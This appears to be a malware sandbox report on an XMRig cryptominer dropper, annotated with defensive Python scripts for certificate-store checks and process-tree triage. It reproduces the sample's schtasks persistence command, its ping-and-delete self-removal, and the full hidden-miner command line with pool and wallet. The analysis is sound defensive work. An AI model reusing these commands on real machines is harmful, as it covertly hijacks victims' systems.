Analysis
max time kernel: 152s
max time network: 150s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 25-09-2022 13:43
Static task: static1
Behavioral task: behavioral1, sample 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe, resource win7-20220812-en
Behavioral task: behavioral2, sample 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe, resource win10v2004-20220812-en
The signatures, memory dumps and process tree below all come from behavioral1, the Windows 7 x64 run.
General
Target: 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
Size: 354KB
MD5: e141967a41334d6dd1d7c7adac5ca003
SHA1: 6f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA256: 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA512: 53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9
SSDEEP: 6144:copjgUqY88VzWVa9zTRf7pbyvDROyEcZ:cJUDpyg5da
Malware Config
Signatures

XMRig Miner payload (14 IoCs)
YARA rule xmrig matched 14 memory dumps, all taken from PID 552 in behavioral1, the C:\Windows\explorer.exe instance that services64.exe starts and writes into (see "Suspicious use of SetThreadContext" below and the process tree). Thirteen dumps cover the same 0x140000000-0x140786000 region; 0x140000000 is the default image base of a 64-bit PE, so the hollowed explorer.exe hosts a 64-bit miner image of roughly 7.5 MB. The fourteenth is the mapping dump at 0x14030F3F8 inside that region.
  behavioral1/memory/552-106-0x0000000140000000-0x0000000140786000-memory.dmp
  behavioral1/memory/552-108-0x0000000140000000-0x0000000140786000-memory.dmp
  behavioral1/memory/552-110-0x0000000140000000-0x0000000140786000-memory.dmp
  behavioral1/memory/552-111-0x0000000140000000-0x0000000140786000-memory.dmp
  behavioral1/memory/552-112-0x0000000140000000-0x0000000140786000-memory.dmp
  behavioral1/memory/552-114-0x0000000140000000-0x0000000140786000-memory.dmp
  behavioral1/memory/552-116-0x0000000140000000-0x0000000140786000-memory.dmp
  behavioral1/memory/552-117-0x0000000140000000-0x0000000140786000-memory.dmp
  behavioral1/memory/552-118-0x0000000140000000-0x0000000140786000-memory.dmp
  behavioral1/memory/552-120-0x0000000140000000-0x0000000140786000-memory.dmp
  behavioral1/memory/552-121-0x000000014030F3F8-mapping.dmp
  behavioral1/memory/552-123-0x0000000140000000-0x0000000140786000-memory.dmp
  behavioral1/memory/552-125-0x0000000140000000-0x0000000140786000-memory.dmp
  behavioral1/memory/552-129-0x0000000140000000-0x0000000140786000-memory.dmp

Executes dropped EXE (4 IoCs)
  PID 1428  35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe (the copy re-executed from the Temp sub-folder)
  PID 1504  31609.exe
  PID 1176  services64.exe
  PID 1552  sihost64.exe

Deletes itself (1 IoC)
  PID 1988  cmd.exe

Loads dropped DLL (13 IoCs)
  PID 1736  35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe (2 events)
  PID 876   taskmgr.exe (8 events)
  PID 1428  35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe (1 event)
  PID 1504  31609.exe (1 event)
  PID 1176  services64.exe (1 event)

Adds Run key to start application (2 TTPs, 2 IoCs)
  Set value (str)  \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Default Key = "C:\Users\Admin\AppData\Local\Default Folder\Server.exe"  (35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe)
  Set value (str)  \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Default Key = "\Default Folder\Server.exe"  (35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe)
  The process tree attributes this write to PID 1428. The Server.exe the value points at does not appear anywhere else in this report, so the Run key is a second, unused persistence path alongside the scheduled task below.

Legitimate hosting services abused for malware hosting/C2 (1 TTP)
  No IoC detail is recorded for this signature.

Suspicious use of SetThreadContext (1 IoC)
  PID 1176 services64.exe set the thread context of PID 552 explorer.exe. Together with the 16 WriteProcessMemory calls from 1176 into 552 (listed below) this is consistent with process hollowing of explorer.exe; the xmrig YARA hits above are in that process.

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox's generic text for this signature adds "Likely ransomware behaviour"; nothing else in this report supports that reading, the payload in this run is a miner.

Creates scheduled task(s) (1 TTP, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution. The two IoCs are the schtasks.exe invocations in the process tree (PIDs 1956 and 332), both creating an on-logon task named "services64" that runs C:\Users\Admin\AppData\Local\Temp\services64.exe with /rl highest. On an administrator account an on-logon task with /rl highest starts elevated at every logon without a UAC prompt.

Modifies system certificate store (1 IoC, services64.exe)
  Key created     \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436
  Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde
  A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 is the SHA-1 thumbprint of DigiCert Global Root CA, and the DER inside the blob carries that subject ("DigiCert Global Root CA" is readable in the hex). AuthRoot\Certificates is the cache that CryptoAPI's automatic root update fills the first time a process validates a chain ending in a root it has not cached, so this write is consistent with services64.exe making a TLS connection rather than with planting a rogue root; the entry is still worth verifying, as the example below does. The blob is reproduced as the report shows it (the extraction wrapped it mid-value).
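The Blob value above is not opaque: it is CryptoAPI's serialised certificate context, a run of (property id, reserved = 1, length, payload) records whose 0x20 record is the DER certificate and whose 0x03 record is the SHA-1 thumbprint that also serves as the registry key name. The parser below is an added example, not part of the report: it splits a blob into its properties and checks that the key name, the stored SHA-1 property and the hash of the stored DER agree, which is the check to run on any SystemCertificates entry a sample writes (a certificate filed under a trusted thumbprint that it does not hash to fails it). The sample blob in the block is constructed around a fake DER; to check the entry from this run, hex-decode the output of `reg query "HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436" /v Blob` and pass it to `verify_entry` with the key name.

```python
r"""Parse and cross-check a SystemCertificates "Blob" registry value.

Added example, not part of the sandbox report.  The Blob format is CryptoAPI's
serialisation written under
HKLM\SOFTWARE\Microsoft\SystemCertificates\<store>\Certificates\<SHA1 thumbprint>:
a sequence of records, each  DWORD prop_id | DWORD reserved (=1) | DWORD length | payload.
The sample blob at the bottom is constructed around a fake DER; it is not the
DigiCert blob from the report.
"""
import hashlib
import struct

# CryptoAPI property identifiers (wincrypt.h) that appear in the blob on this page.
PROP_NAMES = {
    3: "CERT_SHA1_HASH_PROP_ID",
    4: "CERT_MD5_HASH_PROP_ID",
    9: "CERT_ENHKEY_USAGE_PROP_ID",
    11: "CERT_FRIENDLY_NAME_PROP_ID",
    15: "CERT_SIGNATURE_HASH_PROP_ID",
    20: "CERT_KEY_IDENTIFIER_PROP_ID",
    25: "CERT_SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID",
    29: "CERT_SUBJECT_NAME_MD5_HASH_PROP_ID",
    32: "CERT_CERT_PROP_ID",  # the DER-encoded certificate itself
}
CERT_PROP, SHA1_PROP, FRIENDLY_PROP, MD5_PROP = 32, 3, 11, 4


def parse_blob(blob: bytes) -> dict:
    """Split a Blob value into {prop_id: payload}; ValueError on a malformed or truncated blob."""
    props, off = {}, 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError(f"truncated record header at offset {off}")
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1:
            raise ValueError(f"unexpected reserved field {reserved} in record {prop_id}")
        if off + length > len(blob):
            raise ValueError(f"record {prop_id} claims {length} bytes past the end of the blob")
        props[prop_id] = blob[off:off + length]
        off += length
    return props


def is_well_formed(blob: bytes) -> bool:
    try:
        parse_blob(blob)
        return True
    except ValueError:
        return False


def verify_entry(key_name: str, blob: bytes) -> dict:
    """Check that the registry key name, the stored CERT_SHA1_HASH property and the
    SHA-1 of the stored DER all agree; a planted or tampered entry breaks that agreement."""
    props = parse_blob(blob)
    der = props.get(CERT_PROP)
    if der is None:
        raise ValueError("no CERT_CERT_PROP_ID record: properties only, no certificate")
    actual = hashlib.sha1(der).hexdigest().upper()
    friendly = props.get(FRIENDLY_PROP, b"").decode("utf-16-le").rstrip("\x00")
    return {
        "friendly_name": friendly,
        "thumbprint": actual,
        "key_name_matches": actual == key_name.upper(),
        "sha1_prop_matches": props.get(SHA1_PROP) == bytes.fromhex(actual),
        "properties": [PROP_NAMES.get(p, f"prop_{p}") for p in props],
    }


def build_blob(der: bytes, friendly: str) -> bytes:
    """Serialise a blob in the same record layout, for the constructed sample below."""
    records = [
        (MD5_PROP, hashlib.md5(der).digest()),
        (FRIENDLY_PROP, (friendly + "\x00").encode("utf-16-le")),
        (SHA1_PROP, hashlib.sha1(der).digest()),
        (CERT_PROP, der),
    ]
    return b"".join(struct.pack("<III", pid, 1, len(data)) + data for pid, data in records)


# Constructed stand-in for a DER certificate (a bare ASN.1 SEQUENCE, not a real cert).
FAKE_DER = bytes.fromhex("3006020101020102")
FAKE_THUMB = hashlib.sha1(FAKE_DER).hexdigest().upper()
FAKE_BLOB = build_blob(FAKE_DER, "Example Root")
# Same blob with the last byte of the certificate flipped: key name and SHA-1 property no longer match.
TAMPERED_BLOB = FAKE_BLOB[:-1] + bytes([FAKE_BLOB[-1] ^ 0x01])

if __name__ == "__main__":
    for name, blob in (("genuine", FAKE_BLOB), ("tampered", TAMPERED_BLOB)):
        print(name, verify_entry(FAKE_THUMB, blob))
```

The parser refuses a record whose length runs past the end of the blob rather than returning a partial certificate, so a blob damaged in transit (as the wrapped hex above may be) is reported as malformed instead of silently producing a wrong thumbprint.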
Runs ping.exe (1 TTP, 1 IoC)
  PID 472 PING.EXE, spawned by cmd.exe 1988 as the delay before the self-delete (see the process tree).

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  PID 1428  35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe (5 events)
  PID 876   taskmgr.exe (57 events)
  PID 1504  31609.exe (1 event)
  PID 1176  services64.exe (1 event)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  PID 1428  35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

Suspicious behavior: LoadsDriver (1 IoC)
  PID 464 (image name not recorded by the sandbox)

Suspicious use of AdjustPrivilegeToken (7 IoCs)
  SeDebugPrivilege: 1736 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe, 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe, 876 taskmgr.exe, 1504 31609.exe, 1176 services64.exe
  SeLockMemoryPrivilege: 552 explorer.exe (2 events)
  SeLockMemoryPrivilege is the privilege XMRig enables to allocate large pages for its RandomX dataset; here it is requested by the explorer.exe instance that hosts the miner, not by the dropper chain, which is a further sign that 552 is not a genuine explorer.exe.

Suspicious use of FindShellTrayWindow (64 IoCs)
  PID 876  taskmgr.exe (64 events)

Suspicious use of SendNotifyMessage (64 IoCs)
  PID 876  taskmgr.exe (64 events)

Suspicious use of SetWindowsHookEx (1 IoC)
  PID 1428  35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

Suspicious use of WriteProcessMemory (54 IoCs)
  writer -> target (events)
  1736 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe -> 1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe (4)
  1736 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe -> 1988 cmd.exe (4)
  1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe -> 876 taskmgr.exe (4)
  1988 cmd.exe -> 472 PING.EXE (4)
  1428 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe -> 1504 31609.exe (4)
  1504 31609.exe -> 1744 cmd.exe (3)
  1744 cmd.exe -> 1956 schtasks.exe (3)
  1504 31609.exe -> 1176 services64.exe (3)
  1176 services64.exe -> 828 cmd.exe (3)
  828 cmd.exe -> 332 schtasks.exe (3)
  1176 services64.exe -> 1552 sihost64.exe (3)
  1176 services64.exe -> 552 explorer.exe (16)
  The three or four writes per parent/child pair are the pattern every child creation in this tree shows; the 16 writes from services64.exe into explorer.exe, combined with the SetThreadContext call above, are the injection of the miner image.
Processes

C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe  [PID 1736]
  cmdline: "C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe  [PID 1428, parent 1736]
    cmdline: "C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\taskmgr.exe  [PID 876, parent 1428]
      cmdline: "C:\Windows\System32\taskmgr.exe"
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage

    C:\Users\Admin\AppData\Local\Temp\31609.exe  [PID 1504, parent 1428]
      cmdline: "C:\Users\Admin\AppData\Local\Temp\31609.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\cmd.exe  [PID 1744, parent 1504]
        cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\schtasks.exe  [PID 1956, parent 1744]
          cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
          - Creates scheduled task(s)

      C:\Users\Admin\AppData\Local\Temp\services64.exe  [PID 1176, parent 1504]
        cmdline: "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of SetThreadContext
        - Modifies system certificate store
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        C:\Windows\System32\cmd.exe  [PID 828, parent 1176]
          cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
          - Suspicious use of WriteProcessMemory

          C:\Windows\system32\schtasks.exe  [PID 332, parent 828]
            cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
            - Creates scheduled task(s)

        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe  [PID 1552, parent 1176]
          cmdline: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
          - Executes dropped EXE

        C:\Windows\explorer.exe  [PID 552, parent 1176]
          cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=45Z2KUa15GKDWbtk11MXVih9n7GnPVpfzW9jk9FuCar8EidLwFBvMH4EoTAzjt7pue3fRnuGx3Sb5g8p4o4mJr3V6Xqu6Cw --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
          - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\cmd.exe  [PID 1988, parent 1736]
    cmdline: "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"
    - Deletes itself
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\PING.EXE  [PID 472, parent 1988]
      cmdline: ping 1.1.1.1 -n 1 -w 1000
      - Runs ping.exe

Reading the tree:
  - The first stage (1736) copies itself into a Temp sub-folder named after its own hash, runs that copy (1428), and removes the original through cmd.exe 1988, using a single ping to 1.1.1.1 with a one-second timeout as the delay before Del.
  - taskmgr.exe, cmd.exe and PING.EXE resolve to C:\Windows\SysWOW64\ although they were requested as System32 paths: file-system redirection, so 1736, 1428 and 1988 are 32-bit processes. services64.exe launches the 64-bit C:\Windows\explorer.exe and the xmrig YARA hits sit at image base 0x140000000, so the injected miner is a 64-bit image.
  - Persistence is a scheduled task named services64, created twice (by 31609.exe via 1744/1956 and again by services64.exe via 828/332): trigger onlogon, /rl highest, target C:\Users\Admin\AppData\Local\Temp\services64.exe. sihost64.exe under AppData\Roaming\Microsoft\Libs is started by services64.exe but does nothing further in this run.
  - The command line of the hollowed explorer.exe is a complete miner configuration: RandomX (rx/0), pool pool.hashvault.pro on port 80, a 95-character Monero wallet as the user, an empty password and a 40% thread hint. The --cinit-* switches are not upstream XMRig options; they belong to the wrapper that built this payload, and their names (idle-wait, idle-cpu, stealth-targets) indicate mining gated on idle time and on the absence of monitoring tools. The stealth-targets value is an opaque base64 string in the report and is not decoded here.
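Everything needed for a first triage is in the command lines above. The script below is an added example, not part of the report: it tokenises Windows command lines (keeping quoted spans intact, including the doubled quoting schtasks uses for /tr), pulls the pool, wallet and algorithm out of an XMRig-style invocation, recognises a schtasks /create on-logon task pointing into a user-writable directory, recognises the ping-then-del self-removal, and flags a miner command line running under a C:\Windows image as an injected host. TREE is transcribed from the process list above; the tag names and the set of user-writable path markers are this example's own choices.

```python
# Triage helpers for the process tree above: tokenise each command line, pull the miner
# configuration out of the hollowed explorer.exe and tag persistence and self-deletion.
# Added example, not part of the sandbox report; TREE is transcribed from the report.
import re
from collections import namedtuple

SAMPLE = "35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"
TMP = r"C:\Users\Admin\AppData\Local\Temp"
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
MONERO_ADDR = re.compile(r"[48][1-9A-HJ-NP-Za-km-z]{94}")  # 95-char base58 Monero address
SELF_DELETE = re.compile(r"\bping\b[^&]*&\s*del\b", re.I)   # "ping ... & del" self-removal delay
Proc = namedtuple("Proc", "pid ppid image cmdline")


def tokenize(cmd):
    """Split on whitespace, keeping "..." and '...' spans whole (Windows-style quoting)."""
    return re.findall(r'"[^"]*"|\'[^\']*\'|\S+', cmd)


def unquote(tok):
    return tok.strip("\"'")  # peels nested layers such as '"C:\x.exe"' (schtasks /tr above)


def long_opts(tokens):
    """--key=value and --key value pairs as a dict; bare --flags map to True."""
    opts, i = {}, 0
    while i < len(tokens):
        t, nxt = tokens[i], tokens[i + 1] if i + 1 < len(tokens) else "-"
        if t.startswith("--"):
            k, eq, v = t[2:].partition("=")
            if eq:
                opts[k] = unquote(v)
            elif not nxt.startswith("-"):
                opts[k], i = unquote(nxt), i + 1
            else:
                opts[k] = True
        i += 1
    return opts


def miner_config(cmdline):
    """Pool/wallet/algo for an XMRig-style command line, else None; --cinit-* switches are
    not upstream XMRig options, so they are reported separately as wrapper options."""
    o = long_opts(tokenize(cmdline))
    if "url" not in o or "user" not in o or not ({"algo", "coin"} & o.keys()):
        return None
    return {"pool": o["url"], "wallet": o["user"], "algo": o.get("algo") or o.get("coin"),
            "wallet_is_monero": bool(MONERO_ADDR.fullmatch(str(o["user"]))),
            "wrapper_opts": sorted(k for k in o if k.startswith("cinit-"))}


def schtasks_persistence(cmdline):
    """Task name, trigger, run level and target of a schtasks /create, else None."""
    toks = [unquote(t) for t in tokenize(cmdline)]
    low = [t.lower() for t in toks]
    if "schtasks" not in cmdline.lower() or "/create" not in low or "/tr" not in low[:-1]:
        return None
    args = {low[i]: toks[i + 1] for i in range(len(toks) - 1) if low[i].startswith("/")}
    return {"task": args.get("/tn"), "trigger": args.get("/sc", "").lower(),
            "run_level": args.get("/rl", "").lower(), "target": args["/tr"],
            "user_writable": any(m in args["/tr"].lower() for m in USER_WRITABLE)}


def triage(procs):
    """Tag each process; returns {pid: [tags]}."""
    out = {}
    for p in procs:
        tags = out.setdefault(p.pid, [])
        if miner_config(p.cmdline):
            tags.append("xmrig")
            if p.image.lower().startswith("c:\\windows\\"):
                tags.append("miner-in-system-image")  # hollowed/injected host process
        t = schtasks_persistence(p.cmdline)
        if t and t["trigger"] == "onlogon" and t["user_writable"]:
            tags.append("schtasks-onlogon-userdir")
        if SELF_DELETE.search(p.cmdline):
            tags.append("ping-delay-self-delete")
    return out


def ancestry(procs, pid):
    """Root-to-leaf PID chain (dropper > stage 2 > loader > miner host)."""
    by_pid, chain = {p.pid: p for p in procs}, []
    while pid in by_pid:
        chain.append(pid)
        pid = by_pid[pid].ppid
    return chain[::-1]


SCHTASKS = rf"""schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"{TMP}\services64.exe"'"""
CMD_SCHTASKS = rf'"C:\Windows\System32\cmd.exe" /c {SCHTASKS} & exit'
MINER_CMD = (r'C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 '
             r'--randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 '
             r'--url=pool.hashvault.pro:80 --user=45Z2KUa15GKDWbtk11MXVih9n7GnPVpfzW9jk9FuCar8EidLwF'
             r'BvMH4EoTAzjt7pue3fRnuGx3Sb5g8p4o4mJr3V6Xqu6Cw --pass= --cpu-max-threads-hint=40 '
             r'--cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yC'
             r'YlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth')
S2 = rf"{TMP}\{SAMPLE[:-4]}\{SAMPLE}"  # second-stage copy in its own sub-folder
TREE = [
    Proc(1736, None, rf"{TMP}\{SAMPLE}", rf'"{TMP}\{SAMPLE}"'),
    Proc(1428, 1736, S2, f'"{S2}"'),
    Proc(876, 1428, r"C:\Windows\SysWOW64\taskmgr.exe", r'"C:\Windows\System32\taskmgr.exe"'),
    Proc(1504, 1428, rf"{TMP}\31609.exe", rf'"{TMP}\31609.exe"'),
    Proc(1744, 1504, r"C:\Windows\System32\cmd.exe", CMD_SCHTASKS),
    Proc(1956, 1744, r"C:\Windows\system32\schtasks.exe", SCHTASKS),
    Proc(1176, 1504, rf"{TMP}\services64.exe", rf'"{TMP}\services64.exe"'),
    Proc(828, 1176, r"C:\Windows\System32\cmd.exe", CMD_SCHTASKS),
    Proc(332, 828, r"C:\Windows\system32\schtasks.exe", SCHTASKS),
    Proc(1552, 1176, r"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe", r'"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"'),
    Proc(552, 1176, r"C:\Windows\explorer.exe", MINER_CMD),
    Proc(1988, 1736, r"C:\Windows\SysWOW64\cmd.exe", rf'"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del "{TMP}\{SAMPLE}"'),
    Proc(472, 1988, r"C:\Windows\SysWOW64\PING.EXE", "ping 1.1.1.1 -n 1 -w 1000"),
]

if __name__ == "__main__":
    print({pid: (ancestry(TREE, pid), t) for pid, t in triage(TREE).items() if t})
```

Run against the tree, the only process tagged xmrig is 552, and it is also tagged miner-in-system-image because the image is C:\Windows\explorer.exe; the explorer.exe that Windows itself starts never carries --url or --algo, so that pairing alone is a high-confidence detection regardless of which wrapper produced the command line. The same tokeniser is what makes the schtasks check reliable: /tr is passed as '"...\services64.exe"', and a naive split on spaces or a single quote-strip misses the path.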
Network
MITRE ATT&CK Enterprise v6
Downloads
The report lists each dropped file once per observation; the unique files are:

(path not recorded)
Filesize: 43KB
MD5: fec701bbc6a35f9089309f34afbed29c
SHA1: 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256: d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512: b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
(also listed as \Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe)
Filesize: 354KB
MD5: e141967a41334d6dd1d7c7adac5ca003
SHA1: 6f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA256: 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
